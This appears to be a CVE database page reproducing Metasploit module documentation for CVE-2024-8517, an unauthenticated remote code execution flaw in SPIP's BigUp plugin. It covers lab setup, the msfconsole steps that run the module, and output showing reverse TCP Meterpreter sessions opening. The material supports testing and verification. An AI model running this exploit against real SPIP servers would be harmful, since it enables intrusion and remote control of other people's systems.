4837 Total CVEs
26 Years
GitHub
Home / 2024 / CVE-2024-8517
README.md
Rendering markdown...
POC / spip_bigup_unauth_rce.md MD
⬇ Raw GitHub ✕ Close 
## Vulnerable Application

This Metasploit module exploits a Remote Code Execution vulnerability in SPIP
versions up to and including 4.3.1, specifically in the BigUp plugin.
The vulnerability occurs due to improper handling of file uploads in the
`lister_fichiers_par_champs` function, which can be exploited by crafting a malicious multipart form request.
This allows an attacker to inject and execute arbitrary PHP code on the server.

### Non-Docker Setup

To replicate a vulnerable environment for testing, follow these steps:

1. Download and set up SPIP version 4.3.1.
2. Use the built-in PHP server to host the SPIP instance.

#### Commands to Set Up the Vulnerable Environment:

```bash
wget https://files.spip.net/spip/archives/spip-v4.3.1.zip
mkdir spip && mv spip-v4.3.1.zip spip
cd spip && unzip spip-v4.3.1.zip
php -S 0.0.0.0:8000
```

- **SPIP Access URL:** `http://localhost:8000`
- **SPIP Version:** 4.3.1

After starting the PHP server, SPIP will be accessible at `http://localhost:8000`.

To complete the installation:

1. Navigate to `http://localhost:8000/ecrire` to access the SPIP web installation panel.
2. Follow the on-screen instructions to complete the setup.

## Verification Steps

1. Set up a SPIP instance using the commands provided above.
2. Launch `msfconsole` in your Metasploit framework.
3. Use the module: `use exploit/multi/http/spip_bigup_unauth_rce`.
4. Set `RHOSTS` to the local IP address or hostname of the target.
5. Configure necessary options such as `TARGETURI`, `SSL`, and `RPORT`.
6. Execute the exploit using the `run` or `exploit` command.
7. If the target is vulnerable, the module will execute the specified payload.

## Options

- **FORM_PAGE**: This option allows you to specify a custom page on the target SPIP installation that contains a form.
By default, the module will automatically check the `login` and `contact` pages for forms,
but if you know of another page that contains a form, you can specify it here.
For example, if an article page contains a form, you can set this option like so:

```
set FORM_PAGE /spip.php?article1
```

This will instruct the module to look for the form data on `/spip.php?article1`.
If the specified page contains the vulnerable form, the module will proceed with the exploitation.
This option is particularly useful when the default pages (`login` and `contact`) do not contain the form or are not accessible.

## Scenarios

### Successful Exploitation Against Local SPIP 4.3.1

**Setup**:

- Local SPIP instance with version 4.3.1.
- Metasploit Framework.

**Steps**:

1. Start `msfconsole`.
2. Load the module via `use exploit/multi/http/spip_bigup_unauth_rce`
3. Set `RHOSTS` to the local IP (e.g., 127.0.0.1).
4. Configure other necessary options (`TARGETURI`, `SSL`, etc.).
5. Launch the exploit:
```bash
exploit
```

**Expected Results**:

With `php/meterpreter/reverse_tcp`:

```bash
msf6 exploit(multi/http/spip_bigup_unauth_rce) > run http://127.0.0.1:8000

[*] Started reverse TCP handler on 192.168.1.36:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] SPIP Version detected: 4.3.1
[+] The target appears to be vulnerable. The detected SPIP version (4.3.1) is vulnerable.
[*] Preparing to send exploit payload to the target...
[*] Sending stage (39927 bytes) to 192.168.1.36
[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 192.168.1.36:46322) at 2024-09-03 20:08:36 +0200

meterpreter > sysinfo 
Computer    : linux
OS          : Linux linux 5.15.0-119-generic #129-Ubuntu SMP Fri Aug 2 19:25:20 UTC 2024 x86_64
Meterpreter : php/linux
meterpreter > 
```

With `cmd/linux/http/x64/meterpreter/reverse_tcp`:

```bash
msf6 exploit(multi/http/spip_bigup_unauth_rce) > run http://127.0.0.1:8000

[*] Started reverse TCP handler on 192.168.1.36:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] SPIP Version detected: 4.3.1
[+] The target appears to be vulnerable. The detected SPIP version (4.3.1) is vulnerable.
[*] Preparing to send exploit payload to the target...
[*] Sending stage (3045380 bytes) to 192.168.1.36
[*] Meterpreter session 2 opened (192.168.1.36:4444 -> 192.168.1.36:58062) at 2024-09-03 20:09:20 +0200

meterpreter > sysinfo 
Computer     : 192.168.1.36
OS           : LinuxMint 21.3 (Linux 5.15.0-119-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```

- The module successfully exploits the vulnerability and opens a Meterpreter session on the target.

**Note**: Ensure the SPIP instance is correctly configured and running using the manual setup for the exploit to work as expected.